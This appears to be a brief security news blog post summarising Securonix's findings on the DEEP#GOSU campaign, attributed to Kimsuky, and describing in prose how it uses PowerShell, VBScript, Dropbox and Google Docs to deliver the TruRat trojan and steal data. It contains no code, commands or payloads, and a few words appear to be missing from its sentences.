Skip to content Skip to footer

Sophisticated DEEP#GOSU Attack Campaign Uncovered by Securonix

Cybersecurity firm Securonix has discovered a complex, multi-stage attack campaign dubbed DEEP#GOSU, likely linked to the North Korean state-sponsored group Kimsuky. The campaign uses PowerShell and VBScript to infect systems and steal sensitive information.

The utilized in this attack is designed to operate covertly on systems, with features such as keylogging, clipboard monitoring, dynamic payload execution, and data exfiltration. It also uses remote access tools and scheduled tasks for persistence.

One significant aspect of this attack is its use of legitimate services such as Dropbox and Google Docs for command and control. This allows the attackers to blend in with regular network traffic, update the 's functionality, and deliver additional modules.

The attack begins with a malicious email attachment containing a ZIP archive with a phony file. This file contains a PowerShell script and a decoy document. The PowerShell script then communicates with a Dropbox infrastructure controlled by the attackers to obtain and execute another PowerShell script.

This second-stage script downloads a .NET assembly file from Dropbox, which is, in reality, a remote access trojan known as TruRat. This trojan can record keystrokes, manage files, and facilitate remote control. Kimsuky has previously used TruRat in other campaigns.

The PowerShell script also downloads a VBScript from Dropbox, designed to run arbitrary code retrieved from the cloud storage service. This includes another PowerShell script that uses Management Instrumentation (WMI) to execute commands and set up scheduled tasks for persistence.

The VBScript also uses Google Docs to dynamically retrieve configuration data for the Dropbox connection, enabling the attackers to modify the account information without changing the script itself. The PowerShell script retrieves system information and sends it to Dropbox via a POST request.

Overall, this attack campaign is highly advanced and employs a combination of PowerShell and VBScript to infect and obtain information from systems. Using legitimate services for command-and-control and dynamic configuration retrieval makes identifying and protecting against challenging.

Leave a comment

Newsletter Signup
Address

The Grid —
The Matrix Has Me
Big Bear Lake, CA 92315

01010011 01111001 01110011 01110100 01100101 01101101 00100000
01000110 01100001 01101001 01101100 01110101 01110010 01100101

Kid, don't threaten me. There are worse things than death, and uh, I can do all of them.The Plague

Deitasoft © 2024. All Rights Reserved.